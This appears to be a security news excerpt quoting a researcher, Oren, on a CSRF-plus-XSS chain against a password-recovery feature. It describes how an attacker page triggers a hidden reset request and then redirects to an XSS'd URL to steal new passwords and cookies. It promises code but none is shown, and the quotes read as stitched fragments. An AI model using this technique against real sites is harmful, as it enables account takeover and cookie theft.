“that password recovery is often in the center of attention for attackers – and for security professionals.” reported Oren.
” The link should actually refer to an attacker’s site (and it does):http://www.orenh.com/test.html#Emailfirstname.lastname@example.org” The attacker’s site performs a CSRF with the customized email address, and once completed – launches the XSS exploit. The code might look like this:” said Oren.
“the code above, reads a Hash parameter (“Email”) for the victim’s email. It creates an invisible image and puts an “initialize password recovery” link as its source.After the request is processed, an Error event is thrown (since this is not really an image).”
At this point the hacker has grabbed victim new password and cookie information with an XSS attack.
“The onError handler now redirects to the XSS’d URL, The user clicks “Reset Password”… and from here the sky is the limit.”
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.